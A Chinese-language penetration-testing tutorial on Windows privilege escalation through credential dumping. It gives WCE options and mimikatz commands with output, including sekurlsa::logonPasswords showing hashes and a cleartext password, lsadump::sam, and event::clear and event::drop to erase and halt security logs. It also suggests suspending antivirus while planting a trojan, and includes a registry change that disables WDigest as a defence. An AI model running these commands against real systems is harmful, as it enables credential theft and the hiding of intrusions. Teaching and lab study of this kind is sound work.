渗透测试之提权:利用相关工具提权
一、WINDOWS身份认证过程
账户在登陆的目标服务器/系统后,系统中 WDisgest 安全包会在内存中维护当前处于登录状态账户明文的密码,当注销登陆后才会被删除。
二、WCE (WINDOWS CREDENTIAL EDITOR
Windows Credentials Editor (WCE)(windows凭证信息编辑器)是一款功能强大的windows平台内网渗透工具。
作用
它可以列举登陆会话,并且可以添加、改变和删除相关凭据(例如:LM/NT hashes)。这些功能在内网渗透中能够被利用,例如,在windows平台上执行绕过hash或者从内存中获取NT/LM hashes(也可以从交互式登陆、服务、远程桌面连接中获取)以用于进一步的攻击。可以查看系统当前登陆用户的登陆密码的密文形式和明文形式。
要求
使用需具有管理员权限
安装
apt-get install wce
root@kali:/usr/share/windows-resources/wce# ls
getlsasrvaddr.exe README wce32.exe wce64.exe wce-universal.exe
help
C:\wce>wce-universal.exe -h WCE v1.41beta (Windows Credentials Editor) - (c) 2010-2013 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com) Use -h for help. Options: -l List logon sessions and NTLM credentials (default). -s Changes NTLM credentials of current logon session. Parameters: <UserName>:<DomainName>:<LMHash>:<NTHash>. -r Lists logon sessions and NTLM credentials indefinitely. Refreshes every 5 seconds if new sessions are found. Optional: -r<refresh interval>. -c Run <cmd> in a new session with the specified NTLM credentials. Parameters: <cmd>. -e Lists logon sessions NTLM credentials indefinitely. Refreshes every time a logon event occurs. -o saves all output to a file. Parameters: <filename>. -i Specify LUID instead of use current logon session. Parameters: <luid>. -d Delete NTLM credentials from logon session. Parameters: <luid>. -a Use Addresses. Parameters: <addresses> -f Force 'safe mode'. -g Generate LM & NT Hash. Parameters: <password>. -K Dump Kerberos tickets to file (unix & 'windows wce' format) -k Read Kerberos tickets from file and insert into Windowscache -w Dump cleartext passwords stored by the digest authentication package -v verbose output.
参数:
-l :查看当前登录账号的密码的密文形式的哈希值【lmhash:nthash】
-lv:表示查看更详细的信息【注入模式可能会对系统进程造成损坏】
-r:每隔几秒去重新读下,看有没有新账户登录(默认5s)。
-d:通过指定LUID删除某一会话。
-g:计算指定密码的LM和NTLM哈希值。
-w:读内存中 WDisgest 安全包维护的当前登录账户的明文密码。
注意:wce是从内存中读取,pwdump是从数据库SAM中读取的!
示例
将wce整个文件夹拷到测试机(以xp_sp3为例),在xp上多建几个账号并通过切换用户使其分别处于登录状态。
参数 -l:
参数 -lv:
参数 -r:
登录 a 账户
参数 -d:
参数 -g:
参数 -w:
参数 -i + -s(修改指定会话的登录信息):
如:将 a 的登录会话修改成 administrator 账号
三、WCE攻击防御
由于系统是通过 Digest Authentication Package 在内存中维护明文密码,默认自启动,为此可去注册表中关闭默认启动。
注册表路径:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages
Security Packages默认项:
- kerberos
- msv1_0
- schannel
- wdigest 本地内存维护明文密码
- tspkg 远程终端维护……
- pku2u
四、相似工具
1、pwdump
参见:https://www.cnblogs.com/z9m8r8/articles/15892054.html
2、fgdump
Kali路径:/usr/share/windows-binaries/fgdump
XP演示:
3、mimikatz
Kali 路径:/usr/share/windows-resources/mimikatz
帮助信息(用双冒号查看命令模块和子模块)
C:\Documents and Settings\Administrator\Desktop\mimikatz\Win32>mimikatz.exe .#####. mimikatz 2.2.0 (x86) #18362 May 13 2019 01:34:39 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > http://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####' > http://pingcastle.com / http://mysmartlogon.com ***/ mimikatz # :: ERROR mimikatz_doLocal ; "" module not found ! standard - Standard module [Basic commands (does not require module name)] crypto - Crypto Module sekurlsa - SekurLSA module [Some commands to enumerate credentials...] kerberos - Kerberos package module [] privilege - Privilege module process - Process module service - Service module lsadump - LsaDump module ts - Terminal Server module event - Event module misc - Miscellaneous module token - Token manipulation module vault - Windows Vault/Credential module minesweeper - MineSweeper module net - dpapi - DPAPI Module (by API or RAW access) [Data Protection application programming interface] busylight - BusyLight Module sysenv - System Environment Value module sid - Security Identifiers module iis - IIS XML Config module rpc - RPC control of mimikatz sr98 - RF module for SR98 device and T5577 target rdm - RF module for RDM(830 AL) device acr - ACR Module
privilege模块:提权
mimikatz # privilege:: ERROR mimikatz_doLocal ; "(null)" command of "privilege" module not found ! Module : privilege Full name : Privilege module debug - Ask debug privilege driver - Ask load driver privilege security - Ask security privilege tcb - Ask tcb privilege backup - Ask backup privilege restore - Ask restore privilege sysenv - Ask system environment privilege id - Ask a privilege by its id name - Ask a privilege by its name mimikatz # privilege::debug #提权到debug Privilege '20' OK
sekurlsa模块:查看登录账号密码信息等
mimikatz # sekurlsa:: ERROR mimikatz_doLocal ; "(null)" command of "sekurlsa" module not found ! Module : sekurlsa Full name : SekurLSA module Description : Some commands to enumerate credentials... msv - Lists LM & NTLM credentials wdigest - Lists WDigest credentials kerberos - Lists Kerberos credentials tspkg - Lists TsPkg credentials livessp - Lists LiveSSP credentials ssp - Lists SSP credentials logonPasswords - Lists all available providers credentials process - Switch (or reinit) to LSASS process context minidump - Switch (or reinit) to LSASS minidump context pth - Pass-the-hash krbtgt - krbtgt! dpapisystem - DPAPI_SYSTEM secret tickets - List Kerberos tickets ekeys - List Kerberos Encryption Keys dpapi - List Cached MasterKeys credman - List Credentials Manager mimikatz # sekurlsa::logonPasswords Authentication Id : 0 ; 242726 (00000000:0003b426) Session : Interactive from 0 User Name : Administrator Domain : DH-CA8822AB9589 Logon Server : DH-CA8822AB9589 Logon Time : 2/15/2022 9:14:59 AM SID : S-1-5-21-583907252-1757981266-1177238915-500 msv : [00000002] Primary * Username : Administrator * Domain : DH-CA8822AB9589 * LM : 44efce164ab921caaad3b435b51404ee * NTLM : 32ed87bdb5fdc5e9cba88547376818d4 * SHA1 : 6ed5833cf35286ebf8662b7b5949f0d742bbec3f wdigest : * Username : Administrator * Domain : DH-CA8822AB9589 * Password : 123456 kerberos : * Username : Administrator * Domain : DH-CA8822AB9589 * Password : 123456 ssp : credman : Authentication Id : 0 ; 997 (00000000:000003e5) Session : Service from 0 User Name : LOCAL SERVICE Domain : NT AUTHORITY Logon Server : (null) Logon Time : 2/15/2022 9:08:41 AM SID : S-1-5-19 msv : …………………………
process模块:管理进程
mimikatz # process:: ERROR mimikatz_doLocal ; "(null)" command of "process" module not found ! Module : process Full name : Process module list - List process exports - List exports imports - List imports start - Start a process stop - Terminate a process suspend - Suspend a process resume - Resume a process run - Run! runp - mimikatz # process::start cmd Trying to start "cmd" : OK ! (PID 3888)
service模块:服务管理
mimikatz # service:: ERROR mimikatz_doLocal ; "(null)" command of "service" module not found ! Module : service Full name : Service module start - Start service remove - Remove service stop - Stop service suspend - Suspend service resume - Resume service preshutdown - Preshutdown service shutdown - Shutdown service list - List services + - Install Me! - - Install Me! me - Me!
suspend子模块:挂起进程,可用于植入木马时,暂停防病毒软件。
resume子模块:进程恢复
lsadump模块
mimikatz # lsadump:: ERROR mimikatz_doLocal ; "(null)" command of "lsadump" module not found ! Module : lsadump Full name : LsaDump module sam - Get the SysKey to decrypt SAM entries (from registry or hives) secrets - Get the SysKey to decrypt SECRETS entries (from registry or hives) cache - Get the SysKey to decrypt NL$KM then MSCache(v2) (from registry or hives) lsa - Ask LSA Server to retrieve SAM/AD entries (normal, patch on the fly or inject) trust - Ask LSA Server to retrieve Trust Auth Information (normal or patch on the fly) backupkeys rpdata dcsync - Ask a DC to synchronize an object dcshadow - They told me I could be anything I wanted, so I became a domain controller setntlm - Ask a server to set a new password/ntlm for one user changentlm - Ask a server to set a new password/ntlm for one user netsync - Ask a DC to send current and previous NTLM hash of DC/SRV/WKS packages mimikatz # lsadump::sam #从SAM数据库中读取账号密码 Domain : DH-CA8822AB9589 SysKey : 7be839f49edcab29c3a40fe24d47335f ERROR kull_m_registry_OpenAndQueryWithAlloc ;kull_m_registry_RegOpenKeyEx KO ERROR kuhl_m_lsadump_getUsersAndSamKey ;kull_m_registry_RegOpenKeyEx SAM Accounts (0x00000005)
ts模块:终端服务,默认情况下XP只允许一个活动的登录会话
相当于打上一个补丁,使多个会话可以并行,即多用户登录。
event模块:日志管理
mimikatz # event:: ERROR mimikatz_doLocal ; "(null)" command of "event" module not found ! Module : event Full name : Event module drop - [experimental] patch Events service to avoid new events clear - Clear an event log mimikatz # event::clear Using "Security" event log : - 0 event(s) - Cleared ! - 1 event(s) mimikatz # event::drop
clear:清除已记录的安全日志等
drop:不在进行新的日志记录
misc模块:杂项
token模块
mimikatz # token:: ERROR mimikatz_doLocal ; "(null)" command of "token" module not found ! Module : token Full name : Token manipulation module whoami - Display current identity list - List all tokens of the system elevate - Impersonate a token run - Run! revert - Revert to proces token mimikatz # token::whoami * Process Token : {0;0002ed48} 0 - 333441 DH-CA8822AB9589\Administrator S-1-5-21-583907252-1757981266-1177238915-500 (08g,20p) Primary * Thread Token : no token